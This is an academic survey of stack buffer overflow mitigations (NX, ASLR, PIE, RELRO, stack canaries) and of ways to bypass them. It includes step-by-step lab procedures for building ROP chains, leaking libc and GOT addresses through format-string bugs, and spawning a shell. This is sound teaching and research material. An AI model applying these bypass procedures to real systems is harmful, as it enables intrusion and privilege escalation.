An In-Depth Survey of Bypassing Buffer Overﬂow Mitigation Techniques

: Buffer Overﬂow (BOF) has been a ubiquitous security vulnerability for more than three decades, potentially compromising any software application or system. This vulnerability occurs primarily when someone attempts to write more bytes of data (shellcode) than a buffer can handle. To date, this primitive attack has been used to attack many different software systems, resulting in numerous buffer overﬂows. The most common type of buffer overﬂow is the stack overﬂow vulnerability, through which an adversary can gain admin privileges remotely, which can then be used to execute shellcode. Numerous mitigation techniques have been developed and deployed to reduce the likelihood of BOF attacks, but attackers still manage to bypass these techniques. A variety of mitigation techniques have been proposed and implemented on the hardware, operating system, and compiler levels. These techniques include No-EXecute (NX) and Address Space Layout Randomization (ASLR). The NX bit prevents the execution of malicious code by making various portions of the address space of a process inoperable. The ASLR algorithm randomly assigns addresses to various parts of the logical address space of a process as it is loaded in memory for execution. Position Independent Executable (PIE) and ASLR provide more robust protection by randomly generating binary segments. Read-only relocation (RELRO) protects the Global Offset Table (GOT) from overwriting attacks. StackGuard protects the stack by placing the canary before the return address in order to prevent stack smashing attacks. Despite all the mitigation techniques in place, hackers continue to be successful in bypassing them, making buffer overﬂow a persistent vulnerability. The current work aims to describe the stack-based buffer overﬂow vulnerability and review in detail the mitigation techniques reported in the literature as well as how hackers attempt to bypass them.


Introduction
The computing systems these days are largely dependent on ever evolving hardware infrastructure as well as Internet, that is result is making code complex. Usually these increasing code complexities results in vulnerabilities [1]. These vulnerabilities may go unnoticed for years and may cause significant damage. Programmers tend to make mistakes or build on other programmers' mistakes due to a lack of time, awareness, and dependence on old code [2]. It has been reported and exploited that there are numerous types of software vulnerabilities, including SQL injection, Cross-site scripting, Buffer overflow, Race condition, Integer overflow, OS command injection, missing authentication, and path traversal [3]. Even the slightest vulnerability in software can lead to financial, intellectual, or data loss. For instance, a hack of a SWIFT code has cost the US 81 million USD to Bangladesh's central bank [4]. The Home Depot data breach in 2014 exposed 56 million credit and debit cards information [5]. The Equifax data breach affected approximately 147 million individuals in 2017 [6]. These attacks and research suggest that these vulnerabilities may lead to data loss, financial losses, and in some cases even death. Specifically, this study focuses on buffer overflow (BOF), a vulnerability that is thirty years old yet is still causing the most security breaches among all of the existing vulnerabilities.
To date, buffer overflow has been identified as the most common and dangerous security breach. Cowan named it the "vulnerability of the decade" (1988)(1989)(1990)(1991)(1992)(1993)(1994)(1995)(1996)(1997)(1998), because it was the leading cause of security breaches following its discovery [7]. According to the Common Vulnerabilities and Exposures (CVE) list of 2019, it was the most frequently reported vulnerability, with more than 400 reported vulnerabilities [8]. As of May 2021, the number of reported buffer overflow vulnerabilities in the CVE database has reached over 13,700 [9]. Figure 1 illustrates the CVE statistics of buffer overflow vulnerabilities, showing an apparent increase in vulnerabilities over time. There are number of security breaches that happened due to buffer overflow vulnerability, Tables 1 and 2 list few of the most prominent attacks.

Stack Based Buffer Overflow
An attack using a stack overflow is the most common type of BOF, which corrupts the function stack frame (FSF) or function activation record. A clear understanding of stack-based buffer overflows requires clarification of the basics of process address space and the layout of a stack as they relate to stack buffers.

Process Stack
In x86-64, the code section starts from 0x0400000 address, then we have the initialized and uninitialized data sections, above that we have the heap memory that is used for run time memory allocation. In architectures like x86-64 and MIPS the stack grows towards lower addresses (Aleph 1996) starting from 0x080000000000 and is used to hold function activation records [10]. Figure 2 shows the x86-64 Function Stack Frame (FSF), with register rbp and rsp pointing to the base and top of the active FSF respectively. For x86-64 running UNIX based OS, first six integer and six floating point arguments are passed via registers and the rest are pushed on the stack (if greater than six). For x86-64 running Microsoft Windows, first four integer arguments are passed via registers and the remaining are pushed on the stack (if greater than four). After the function arguments, the return address and contents of rbp register are pushed on the stack and then finally we have the space for local variables of that function. On x86-64 architecture, once the control is transferred to the callee, it performs procedure prolog which grows the process stack and creates the FSF, and the last two assembly instructions of the function are called procedure epilog which are responsible for unwinding the stack [10]. Figure 3 contains a basic C program that is compromised with BOF vulnerability and Figure 4 displays the structure of the copy_buff() function with the procedure prolog and epilog highlighted.
A common occurrence across x86-64 and MIPS instructions sets and a wide range of programming languages is the use of FSF to store the return address during a procedure call that can easily be overridden by a BOF attack [11]. Therefore, changing the return address is the most common method of launching BOF attacks. The C and C++ programming languages are inherently unsafe and vulnerable to buffer overflow due to the fact that they don't provide low-level security measures, such as automatic bound-checking, and allow data and memory manipulation. There are numerous C library functions that are vulnerable to BOFs, including gets(), strcmp(), strcpy(), scanf(), and memcpy() [12]. This is shown in Figure 5, that illustrates writing additional bytes in the buffer of size 10 pictorially, thus causing a buffer overflow.

Stack Smashing
Stack smashing is the most common strategy used by attackers to exploit the local buffers created in stack memory and perform the stack overflow. It requires a vulnerable program and malicious code injection within that vulnerable program's address space. The attackers can exploit the BOF vulnerability by knowing the stack layout and overwriting the current FSF return address to a location containing malicious code. The attacker can gain complete access to the victim machine through a Code-injection attack that is used to inject malicious code into vulnerable application [13]. The injected code runs with that vulnerable application's privileges, and with sufficient privileges, the attacker can gain remote access to the host machine. Conventionally, the attacker uses the code injection technique to inject malicious code for getting a remote shell on the target system; therefore, these malicious codes are also called shellcodes. Figure 6 shows how a well-crafted string can be given as input to the program by the attacker, causing the code injection attack. The critical point in designing the input string is to place the starting address of injected shell code at the specific location, so that it exactly overwrites the saved function return address inside the FSF [14].  Table 3 reflects the contributions in current study, which shows that initially research data has been collected since 1989 that includes journal articles, conference papers, webpages and public databases. In second phase all studies have been compared with selected benchmarks covering all major aspects of BOF attacks. This research also highlights the most prominent BOF attack and most prominent BOF vulnerabilities, its common mitigation techniques based on Hardware, Operating system and Compiler-level. It also includes most common form of BOF attacks that includes code-injection, code-reuse, Return-oriented Programming (ROP) and memory leaks.
The rest of the paper is organized in the following way: Section 2 discusses the hardware-based mitigation techniques and the strategies used to bypass them. Similarly, Sections 3 and 4 present the survey of Software-based and Compiler-based mitigation techniques and their bypassing strategies, respectively. Section 5 concludes this study. To practically launch a BOF attack and bypass different preventive mechanisms, we use x86-64 architecture with Kali Linux-2020 with kernel version 5.9.0 and Ubuntu 18.04.1-desktop with Kernel version 5.4.0-72 as guest operating systems. We used two different hypervisors, Oracle VM VirtualBox 6.0.16 for Kali Linux and VMWare Workstation 16 player for Ubuntu, respectively.

Threats to Validity
This study selected most common and cited articles that are related stack-based buffer flow attack. This study only selected the research who had been implemented to compare their penetration. This study covers the literature only till year 2021 and thus any approach after is excluded. This study only covers major approach based on hardware and Operating System based, other solutions are also excluded from this research.

Hardware-Based Mitigation Techniques
Buffer overflow attacks are launched by altering the saved return address in the FSF of the called function that redirects the execution to an arbitrary code injected by the attacker. Different hardware-based approaches for protecting the saved return address on the stack have been proposed, which are summarized in Table 4. Ref. [15] introduced Smashguard, a hardware stack implemented in the CPU to protect the return address, and was first implemented in Alpha architecture. Each time a function is called, the return address is pushed on the process stack in memory as well as saved in the hardware stack. When a function returns, both the saved return addresses are popped and compared. If both addresses are not the same, the CPU throws an exception, and the process is terminated. Ref. [16] introduced a similar approach called Secure return address stack (SRAS), and was first implemented in Alpha 21264 processor. When a function is called, the return address is pushed on SRAS, and the program counter (PC) is set to the target of the call instruction. When a function returns, processor compares the return address from the stack memory with the SRAS return address. If addresses are not identical, the process is terminated. Ref. [17] introduced another hardware-based protection mechanism, that is, the idea of building an untrusted software named on a trusted hardware architecture called XOM (eXecute Only Memory). XOM architecture assign cryptographic keys to each compartment/logical container of a process. XOM key table is used to store the hashes of encrypted data along with their cryptographic keys and later used to protect/verify the actual information. Ref. [18] introduced another architectural approach called Secure Bit, to protect control data such as return address. If secure bit is set for a particular data, it will not be used as control data and mark as untrustworthy [19]. An additional mode named sbit_write mode is introduced to manage the Secure bit. Ref. [20] introduced HSDefender (Hardware/Software Defender) to protect against buffer overflow attacks, and was first implemented in ARM processor. It was mainly designed to protect embedded systems by designing a secure call instruction. HSDefender comes with both protection and checking together, which makes this method more secure. No-Execute (NX) bit is another hardwarebased technique that was first implemented in in AMD64 processors (Athlon64, Opteron) as their protection policy [21]. Later the authors focused on using NX bit to avoid/protect stack-based buffer overflow and different exploitation mechanisms that can be used to perform a BOF attack with NX bit in place.

NX Bit
Von Neumann architecture, a design used in all mainstream microprocessors, enables the same memory space to store both code and data. This can be accomplished using paging, which does not permit the user to set read, write, and execute permissions independently on a specific memory region. The following three options are available for setting the access permissions for a specific region: non-accessible, readable-executable (RX), and readablewriteable-executable (RWX). So, if the read bit is set, the page will also be executable, and this is the main reason that makes code-injection attacks possible [22]. It is proposed that the NX bit be introduced to the hardware in order to remove the execution permissions from memory regions containing data. Through the support of the NX bit, operating systems can mark certain memory areas (heap, stack) as non-executable.
Different architectures use different terms with similar features for NX bit. AMD first introduced NX bit in AMD64 processors (Athlon64, Opteron) in x86 architecture. It allows the controlling execution per page rather than the whole segment by adding a new page table entry [23]. Intel included a similar feature as XD (execute disable) in x86 Pentium 4 processors [24]. A new page table entry (PTE) format was introduced in ARMv6 that included XN (execute never) bit. Andi Kleen first introduced NX bit in Linux Kernel 2.6.8 in 2004 for 64-bit CPUs [25]. NX support is present in Ubuntu 9.10 and all later versions. The mac OS X 10.4.4 onwards supports NX bit on all Apple-supported processors. In Windows operating system, it was first implemented in Windows XP Service Pack 2 and Windows Server 2003. The NX version of Windows is called Data Execution Prevention (DEP) [26].
Operating system support is required for getting benefits from hardware supported NX bit as page table is an Operating system entity. NX bit refers to bit number 63 (starting from zero), which is the most significant bit in the page table. The code can be executed if the NX bit is set to zero (0) for the particular page; if it is set to one (1), it is a non-executable page containing data only. The NX (no-execute) feature is only available with the 64-bit mode. An important thing about the NX feature is its run-time strategy as there is no need for recompilation for getting benefit from this feature. Operating systems mark the stack/ heap memory as non-executable by taking advantage of NX bit, thus preventing a considerable portion of code injection attacks that exploit the Buffer overflow. Figure 7 shows the illustration of NX bit entry in the x86-64 page table entry [27].

Exploiting the NX Bit Mitigation Technique
The use of NX bit has prevented a considerable portion of BOF attacks by preventing code injection. Therefore, adversaries have adapted another strategy named code-reuse attacks [28] in which, instead of injecting malicious code, the attacker uses the pre-existing code in the process address space. Return-to-libc is one of the well-known code-reuse attack technique, in which the attacker exploits the program vulnerability to overwrite the return address with a pointer to the libc function. The standard C library is always linked to programs (written in C language) in almost all operating systems. The basic idea behind a return-to-libc attack is to change the target application's control flow to system() library function, which internally calls the execve() system call. The system() function is invoked with attacker-supplied arguments such as "/bin/sh" for getting a shell on the victim machine [29]. Although quite successful in many environments, however, return-to-libc attacks do suffer with following limitations:

1.
On x86 32-bit machines, arguments can be controlled because they are push on the stack. However, on 64-bit machines, since the function arguments are passed via registers, therefore, return-to-libc attacks would not work.

2.
Attacker can only use those functions present in the code segment or the library's code, limiting the attack functionality. 3.
The arguments that are passed by the attacker might need to contain NULL bytes. However, If the cause of buffer overflow is a function like strcpy() that terminates when encounters NULL bytes. Then return-to-libc attack payload can't carry NULL bytes in the middle of the payload.

Return-Oriented Programming (ROP)
Return-oriented-programming (ROP) is an advanced form of code-reuse attack that permits code execution in the presence of NX bit as well as does not suffer with the mentioned limitations of return-to-libc attacks. It was first presented by Shacham in 2007, in which attackers use the chaining of existing code instead of injecting their own to perform the buffer overflow exploitation [30], which become Return-oriented programming (ROP) later on. They inject malicious data as code pointers instead of shellcode injection [31].
ROP uses pre-existing small instruction sequences named "gadgets" instead of the complete function to overcome the limitations of the return-to-libc attack. These gadgets are defined as short instruction sequences that combine to perform different high-level tasks [32]. Using ROP, there is no need to call a function at all; only small instruction sets (two or three) are used that neither have procedure prolog nor epilog. Although ROP attacks have been launched on various architectures, including SPARC, PowerPC, and ARM [33], Intel x86 is the most likely target of ROP attacks due to its variable-length CISC instruction set properties. Because of the x86 instruction set properties, it is quite easy to find random instruction sequences that provide various similar gadgets in the x86 executable code body. The short instruction sequence of the gadget must be the valid instructions sequence with return instruction as the last one, thus causing the CPU to carry on to the next gadget or payload. Generally, when launching an attack, the attacker overwrites the saved return address on the stack with a code pointer that jumps to the first gadget. Figure 8 gives a general idea of an ROP attack that is used to obtain a shell on the victim machine. First of all, attacker sends some specific number of A's and then overwrites the function return address with a code pointer that points to the first gadget. When the callee executes the return instruction, the control flow is redirected towards the first gadget, and stack pointer is increased by eight (in a 64-bit machine), where it starts pointing to the value residing at the top of the stack, which is in our case is the address of "/bin/sh". After that the first instruction of the first gadget will execute, for instance the pop rdi instruction will pop out the data from the top of the stack (/bin/sh/) and place it in rdi register, and increase the stack pointer by eight. The ret instruction will then redirect the control flow to the second gadget by reading the next code pointer that points the system() function. When system() executes, it checks its first argument, i.e., contents of rdi register, which is /bin/sh, thus spawning a new shell. The following section explains the practical implementation of discussed strategy to obtain shell.

Step by Step Procedure of Bypassing NX Bit Mitigation
An attacker cannot launch stack-based buffer overflow attacks with standard techniques like code-injection attacks or return-to-libc in NX's presence. But with the help of ROP [34], we can perform stack overflow with NX bit enabled. Figure 9 shows the flow of strategy that we have used to bypass NX bit.  Figure 10 shows the sample C program having BOF vulnerability that reads input from the user and copies in a temporary buffer.
As shown in Figure 11, compile the vulnerable program by disabling different protection mechanisms other than NX bit. Address Space Layout Randomization (ASLR) is also disabled by placing zero (0) in the randomize_va_space file residing in /proc/sys/kernel directory.

Phase 2:
The second step is the preparation of the payload that was passed as an input to the executable. The payload over here, are the three ROP gadgets. We first load the vulnerable program in gdb with peda. The address of first ROP gadget "pop rdi; ret", can be found using the asmsearch command of gdb-peda. The address of second ROP gadget "system" can be found by using the print command of gdb, which will print the base address of system() inside libc. Finally, to get the address of "/bin/sh" first, we need to find the starting and ending address of libc in gdb using the info proc map command. After getting those addresses, we can find the "/bin/sh" location in that specific range using the searchmem command. Figure 12 shows the summary of phase 2.

Phase 3:
Now we have all the required addresses to create a payload in python. Figure 13 shows the crafted python script having all the gadget addresses. In order to calculate the number of bytes after which the return address is saved, we have used the pattern_create and pattern_offset commands of gdb_peda, which shows that the offset of saved return address is 22 bytes. Thus, in Figure 13 at line # 5, we have placed 22 As, and after that we have placed the addresses of the ROP gadgets. Once the python script shown in Figure 13, is executed, it generates our payload, which when passed to the vulnerable program will spawn a shell as shown in Figure 13.

OS-Based Mitigation Techniques
The previous section shows that NX bit can also be bypassed using some advanced methodologies such as Return-oriented programming, which shows that NX feature alone is not enough to prevent BOF and other memory corruption attacks. Several other protection strategies are required to provide guaranteed security for computing systems. Some modifications have been done on the software or Operating system level to provide various security mechanisms in past years. Table 5 shows the summary of those security mechanisms. Ref. [30] proposed a library modification approach named libsafe in which is a dynamically loadable library that invokes the safer versions of functions like strcpy(), strcat(), gets(), scanf(). Its limitation is that it provides security for only dynamically linked programs and a subset of unsafe functions. George C. Necula., et al., presented another method, the Proof-carrying code (PCC) [35]. It is a special binary that is produced according to the safety policy provided by the code consumer, and contains a formal proof encoding, which shows that binary is prepared according to consumer's safety rules [36]. Ref. [37] proposed the Program shepherding technique that monitors the transferring of control flow. It also focuses on branch verification and then compares it with a given security policy to verify. It restricts executable code location and determines the location where control will transfer in memory. Ref. [38] presented Address obfuscation, which randomizes code and data sections' addresses of the target application and the relative distance between variables and individual data items. It helps in reducing the probability of successful attacks by making the memory layout hard to predict. Ref. [39] presented a Binary stirring (STIR) technique that provides the x86 code with the ability to self-organize its instruction addresses every time it is launched. It only takes the binary of the application and outputs a new binary with addresses determinable at load-time. Ref. [40] presented Marlin's randomization method that rearranges the code block in the text section of the program's binary whenever it is executed. It makes exploitation difficult for attacks like ROP because shuffling changes the sequence of gadgets that are not useful for attackers. Address Space Layout Randomization (ASLR) is another OS-based technique that was first designed and implemented as a patch for Linux Kernel [41]. Rest of section how ASLR can be adapted to avoid/protect stack-based buffer overflow and different exploitation mechanisms that can be used to perform a BOF attack with ASLR enabled.

Address Space Layout Randomization
To bypass the NX bit mitigation technique we have used ROP, in which the addresses of ROP gadgets must be known. ASLR randomizes the base addresses of various sections of the process, including the stack, heap, shared libraries and executables [42]. Therefore, the attacker cannot use the same exploit every time to abuse the same vulnerable program, rather has to use an explicit payload for every occurrence of randomized program.
ASLR is the first protection mechanism implemented in almost all major operating systems. It was first designed and implemented as a patch for Linux Kernel in July 2001 by the Linux PaX project. In June 2005, Linux kernel version 2.6.12 deployed the ASLR as default [43]. OpenBSD version 3.4 was the first operating system that introduced the default support of ASLR in 2003. In March 2011, it was introduced in iOS 4.3. Mac OS X Leopard 10.5 started implementing ASLR for system libraries in 2007 and extended to cover all applications in 2011. Microsoft Windows Vista and its subsequent versions also provide support for ASLR. Many years have been passed; still, ASLR is an effective approach to protect against modern attacks. It is an active research area, and there is still a lot to do with its design and implementation. It has multiple implementations with the difference in their operations and effectiveness [44]. Recently, a novel approach named ASLR-NG (ASLR Next Generation) has also been presented to overcome the weaknesses of traditional ASLR [42].
In the case of 32-bit systems, only 16 bits are effectively available (or 8 bits in Linux systems with 256 values) for randomization, which is a limitation of ASLR on 32-bit systems, because the 16-bit entropy can be defeated in a few milliseconds using brute force attack [45]. While 64-bit machine provides 40 bits for randomization, that makes brute force attack almost impossible because it could be noticed easily. On 64-bit systems limitation of ASLR realization is that it is vulnerable to memory disclosure and information leakage attacks. The attacker can launch the ROP by revealing a single function address using information leakage attack [46]. The following section describes the similar existing strategy for breaking down the ASLR protection.

Exploiting the ASLR Mitigation Technique
Address Space Layout Randomization is a protection mechanism used to mitigate buffer overflow attacks. It makes it difficult for attackers to know the exact location of the target code. For example, the attacker can't launch return-to-libc attacks because it requires the base address of libc [47]. However, ASLR is not entirely foolproof and can be bypassed using various techniques such as brute force, return-to-plt or information leakage. In the following section, we have discussed an existing methodology basedon information leakage to bypass the ASLR. This method involves information leak as information leakage attacks are more effective than other techniques for bypassing address space randomization [44]. We will be leaking the Procedure Linkage Table (PLT) and Global  Offset Table (GOT) addresses of some functions to launch attack.
The Procedure Linkage Table (PLT) is a data structure used to call external functions whose address is resolved at run time by dynamic linker because their addresses are not known at link time and contains jump stubs [48]. Global Offset Table (GOT) is an array that includes absolute addresses of global variables and library functions currently used by the process. The ith entry in the PLT contains jump instruction to go to the address saved in the GOT's ith entry. It can be understood with the help of Figure 14, which shows how func@plt in a C code points towards the PLT entry. Inside PLT, an indirect pointer jump is made to jump to an address inside GOT. Eventually, GOT calls the dynamic linker that is supposed to be resolved and executed actual code in libc. By getting knowledge of the absolute address of a single function, the adversary will be able to launch a successful attack. Thus, we are going to exploit PLT and GOT for getting address of a single function residing in libc to launch attack.
Step by Step Procedure of Bypassing ASLR Mitigation The Figure 15 shows the flow of strategy that we have used to bypass ASLR. Phase 1: Figure 16 shows a C vulnerable program that consists of a function getMessage() being called by the main() function. After declaring a character buffer of size 200 bytes, it takes input from the user via scanf() function. Since, we know that scanf() has no check for bounds, it takes input until it encounters a white-space or newline character. Hence, we have a buffer overflow vulnerability here. As observed utilizing this vulnerability ASLR can be bypassed.
At first, the vulnerable program is compiled by disabling additional protection mechanisms in addition to ASLR as detailed in Section 3.2.2 (Steps to bypass NX bit mitigation). Address Space Layout Randomization (ASLR) is enabled by placing two (2) in the randomize_va_space file, which shows that process address space is fully randomized. Checksec can be used to identify the mitigation techniques that are enabled and disabled. This is shown in Figure 17.
Phase 2: Following this step is preparation of the exploit payload, which consists of two stages. In the first stage, information will be leaked through GOT. To determine the PLT address of any available function in the program that is used to leak addresses from GOT. By loading the binary in gdb and using the info functions command as shown in Figure 18, we can find a puts@plt function, which is dynamically linked to libc (ld.so). After getting the address of the puts function, we can easily find GOT address by disassembling the PLT address as mentioned in Figure 18. In order to place the address in the RDI register, we need to find the pop RDI: ret gadget that we have already located in the previous section. The script will leak GOT information after placing all the addresses in the payload, however, the program will crash every time after it leaks the information. When the script is rerun after a crash, everything will be randomized. As a result, it is imperative to keep the program running during the second stage of the exploit, so that the leaked addresses can be exploited. One way to do that is, start the program again without letting it die, that can be done by returning to _start, whose address can be simply print in gdb, as shown in Figure 18.    Now after having all the required addresses to create a payload in python. The Figure 19 shows the crafted python script having all the required addresses for stage 1. In order to calculate the number of bytes after which the return address is saved, we have used the pattern_create and pattern_offset commands of gdb_peda, which shows that the offset of saved return address is 216 bytes. Thus, in Figure 19 at line # 1, we have placed 216 As, and after that we have placed all the addresses. Once the python script shown in Figure 19 is executed, it leaks the puts function address in libc after the ASLR performed randomization.

Phase 3:
In the second stage of exploit preparation, we are going to utilize the leaked information for getting the exact address of libc, which will utilize to find the ROP gadgets including system() and /bin/sh for spawning a shell. The first step in the second stage is to find out the puts, system() and /bin/sh address in libc, which can be done using readelf and string commands, as shown in Figure 20. The final step is to find out, how much randomization has been performed via ASLR. Since, we have already found a leaked puts address in stage 1 (phase2), using that we can find the difference/offset and realize that how much randomization ASLR does to the address space as highlighted at line#2 in Figure 21. Using that difference, we can easily find the required gadgets in randomized address space, such as, we can find the actual randomized addresses by adding the difference offset in the values of system() and /bin/sh we have found earlier, as highlighted at line#5 and 6 in Figure 21. Finally, the payload execution will spawn a shell as shown in Figure 21.

Protecting the ELF Binaries
We have already seen in the previous section that ASLR provides randomization-based protection to protect against ROP like attacks. However, it also faces limitation and can be bypassed with a bit of effort. Therefore, to provide more robust protection there exist other mitigation including position independent executable (PIE) and relocation read-only (RELRO) that harden the binaries itself.

Position Independent Executable (PIE)
The machine code instructions being kept in the main memory are known as Position Independent Code (PIC), which is able to execute correctly regardless of the address. In general, shared libraries are compiled as PIC files so that they can be shared by several processes independently of one another. This facilitates the implementation of per-process randomization via ASLR. For each process, different PIC libraries are loaded. Unlike absolute code which must be loaded at a specific memory location, the PIC can be loaded at multiple memory locations without any alteration. Instructions belonging to a particular location execute faster than those addressed with relative addresses; however, the difference is insignificant on modern processors. Code that is independent of position is easily randomized.
The binary generated by the compiler as position independent code is known as Position Independent Executable (PIE) [26]. It provides arbitrary base addresses for the different sections of executable binary. PIE implements the same randomness strategy for executable, similar to the one used for shared libraries and makes exploitation difficult for attackers. If a binary is compiled as Position Independent Executable, the main binary (.text, .plt, .got, .rodata) is also randomized. PIE complements ASLR to prevent attacks. MacOS 10.7, iOS 4.3, and their later versions provide full support for PIE executable. PIE makes it more difficult for adversaries to guess the code address residing in the main executable, just like code reuse attacks using shared library code. The -pie option is used when compiling a program with GCC to make the binary as position independent executable.

Relocation Read-Only (RELRO)
Several other mechanisms have been introduced to harden the binary executables and one of them is Relocation Read-Only (RELRO). As we have already seen that Global offset table (GOT) is used to resolve dynamically linked function of shared libraries. Procedure linkage table contains a jump stub to GOT and resides in .plt section [49]. The .plt section is used for having the instructions that point to the GOT and resides in .got.plt section. When a shared library function is called for the very first time, GOT points back to the PLT, and a call is made to dynamic linker that finds the actual address of that function. After finding the address of the function, it is written to GOT. When the call is made second time, the GOT already contains the address. It is known as "Lazy binding". The noticeable point is that PLT should be at a fixed location from the .text section, GOT should be at known location because it contains information required for the program, and the GOT should be writable for performing lazy binding.
Since, GOT is writable and resides at a fixed location it can be exploited to launch buffer overflow attacks. Thus, to prevent this vulnerability from exploitation, it is required that all the addresses are resolved at the beginning and then marked the GOT as read-only. RELRO [49] is a mitigation technique which in general makes Global Offset Table read-only so that GOT overwriting techniques cannot be used during buffer overflow exploitation. It has two levels of protection: Partial RELRO and Full RELRO [50]. Partial RELRO makes the .got section read-only (but not .got.plt section), due to which GOT overwriting can be done. Full RELRO makes the entire .got section read only including .got.plt section. Thus, any GOT overwriting technique is not allowed.

Step by Step Procedure of Bypassing PIE and RELRO Mitigations
The Figure 22 shows the flow of strategy that we have used to bypass PIE and RELRO.  Figure 23 shows the vulnerable program, having format string (printf) and buffer overflow (getMessage) vulnerability. We need an information leak from binary and to achieve that goal, we will take advantage of format string vulnerability.
First of all, the vulnerable program is compiled by enabling PIE, and RELRO as shown in the Figure 24. ASLR is also enabled. We can verify the enabled mitigation using checksec utility. The next step is to leak information by exploiting the format string vulnerability. We can achieve this by loading the program in gdb, and pass a lot of format specifiers as input, which will leak several memory addresses as shown in the Figure 24. Then look at the memory map of program using vmmap command, and confirm those addresses with the leaked addresses. When we look closely at the leaked addresses, we noticed that the 33rd address is from the executable portion of the vulnerable binary (0x0000555555555000 to 0x0000555555556000). We can also verify this by inputting the %33$lx in the program, as shown in the Figure 24. Thus, in our case the leaked address is 0x0000555555555060 and the executable base address is 0x0000555555555000, so after subtracting them the result is 0x60. Now if we subtract this 0x60 from the leaked address (0x00005555555550a0), we will get a randomized executable base address which can be used to find other functions addresses.  The first part of exploit is shown in Figure 25, that contains all the steps we have performed above to leak information using format string vulnerability.

Phase 2:
The second part of exploit is shown in Figure 26. To accomplish this part, we need to calculate the addresses of _start, pop rdi gadget and pop rsi gadget after randomization. For this purpose, we need to first find the offset of each function and gadget from the executable base address which we have found in the first phase. For example, to calculate the offset of a pop rdi gadget, first we will find its address in the binary using asmsearch utility and then subtract that address with the executable base address. We will do the same with each address, and we will find the offsets of all the functions and gadgets. After finding all the offsets, we will add that offset with the executable base address as highlighted in the figure, and that will give us the actual addresses of functions and gadgets. After executing the exploit, we'll leak the address of printf.

Phase 3:
The final step is to get the actual address of system and /bin/sh after randomization. We can accomplish this by utilizing the printf offset leaked previously in phase 2. We can find the offset of printf in libc using readelf command as shown in the Figure 27, and then subtract it with the leaked printf address to know the actual randomization of addresses as highlighted in the Figure 27, which shows the final part of exploit. We can also find the offset of the system and /bin/sh as done in Section 4.2 (Step by Step Procedure of Bypassing ASLR Mitigation), and will add the calculated change with these system and /bin/sh offsets as highlighted in Figure 27 to get addresses after randomization. Script execution will spawn shell.

Compiler Based Mitigation Techniques
In the previous sections, we have discussed some proposed techniques supported on Hardware and Operating system level to mitigate buffer overflow attacks. We have seen that after so many years of development, those mitigation's can still be bypassed. In this section, we are going to discuss the compiler-based countermeasures that have been proposed to perform automatic detection and prevention against buffer overflow attacks. Table 6 shows the summary of these protection mechanisms. Ref. [51] presented the ProPolice compiler, also called Stack Smashing Protector (SSP) approach based on an improvement in StackGuard. SSP rearranges the memory layout to place pointer or function arguments below local buffers/ arrays in stack memory that protect against code-injection and code-reuse attacks. StackShield is a GNU GCC extension [52] that adds instruction in the program during compilation to maintain a duplicate stack in a different segment where return addresses are copied. It protects against stack smashing attacks as it would not be possible for an attacker to overwrite both addresses through a single vulnerability. Ref. [53] proposed Return Address Defender (RAD), a patch to the GCC compiler that adds safety code to create a protected area for copying return address. It helps the administrator to detect the attack and catch the intruder in real-time by sending a real-time message and email. The tool named Address Sanitizer has been implemented in GCC by Google to detect errors in memory [54]. It is used to detect Out-of-bounds, Use-after-free, and memory leaks. Ref. [55] presented in a compiler approach named StackGuard or Stack Canary.

Stack Canary
A standard stack-based overflow attack changes the return address and alters the application's flow using some code injection method. Various protection and detection techniques have been proposed to mitigate buffer overflow attacks. One of them is Stack Canary. The idea of stack canary was first implemented by [56] and the proposed technique is known as StackGuard. It is a GCC compiler extension that tries to reduce the probability of stack smashing attacks. StackGuard prevents the return address from being changed by inserting a "Canary" next to the return address. When control returns after the function body's execution, it checks whether the canary is not altered by comparing it with its copy saved somewhere else, before jumping to the function's return address. This mechanism assumes that the canary is intact, then the return address is not changed. In standard stack smashing attacks, the only strategy attacker uses is overwriting the bytes linearly, sequentially, and in ascending order. In that way, it is almost impossible to change the return address without overwriting the canary. Figure 28 shows the stack layout of a program compiled with a stack canary.
We have already seen that when a program makes a function call, a function stack frame is created on the stack via procedure prolog ( Figure 28), and when control returns, it performs procedure epilog ( Figure 28). The function prolog of the program compiled with StackGuard is different. First of all, it pushes the canary on the stack and then proceeds with the standard prolog. The epilog checks whether the canary is unchanged; it terminates the process with an error message if the change has occurred. The Figure 29 shows the disassembly of the same copy_buff function whose disassembly was shown in Figure 4, but this time program was compiled with stack canary.
In 1997, StackGuard was first implemented as an extension of GCC 2.7 in Intel x86. In Linux, it was maintained from 1998-2003 in Immunix Linux distribution. GCC patches for stack protection were introduced for IBM from 2001 on-wards [57]. Red Hat engineers, after re-implementing stack protector in GCC 4.1, presented -fstack-protector flag to provide protection (but only for specific functions). In GCC version 4.9, Google implemented the -fstack-protector-strong flag to provide more robust security. Since Ubuntu 6.10, most of the packages use -fstack-protector flag. Since May 2014, all Arch Linux packages are compiled with -fstack-protector-strong flag. Since Fedora 20, all Fedora packages come with -fstack-protector-strong compiled.
In initial implementations of StackGuard, a 32-bit random number was used to generate canary values randomly. There are other types of canaries, as well. For example, a constant value 0x00000000 was used as a NULL canary in the early StackGuard versions. XOR random canary is generated at run-time, is a random number saved on the stack, after XORed with the return address. A constant number 0x000aff0d was also used as canary in the StackGaurd version 2.0.1 named Terminator Canary. It was called so because of having null byte (0x00), line feed (0x0a), and EOF (0xff) characters, that were able to terminate functions like strcpy(), gets() and other libc string copying functions. However, StackGuard also suffers from limitations and has been bypassed. In the following section, we have discussed an existing bypassing method to bypass the Stack Canary along with other mitigation such as PIE, ASLR, and NX.

Step by Step Procedure of Bypassing Canary, PIE, ASLR, and NX Mitigation
We used the technique mentioned in to bypass the most significant mitigation techniques including Canary, ASLR, PIE, and NX bit. Figure 30 shows the strategy that we have used to bypass all the mitigation including stack Canary. Phase 1: Figure 31 shows the vulnerable program used for exploitation having two vulnerabilities including printf function that will be used to exploit format string vulnerability for information leakage, and fgets function that is vulnerable to buffer overflow. First of all, the vulnerable program is compiled with all the mitigation's (NX, ASLR, Canary, PIE) enabled as shown in the Figure 32. We can check the enabled mitigation's using checksec utility. The next step is to exploit the format string vulnerability for revealing the memory locations in our vulnerable program, and for that purpose we have used a python script as shown in Figure 32), that will display format string output multiple times for information leakage also shown in the figure. The values starting with 7f such as the format string output 3 and 5 of correspond to libc addresses, which later can be used to bypass ASLR. The values found at format string output 9 can represent the canary value.
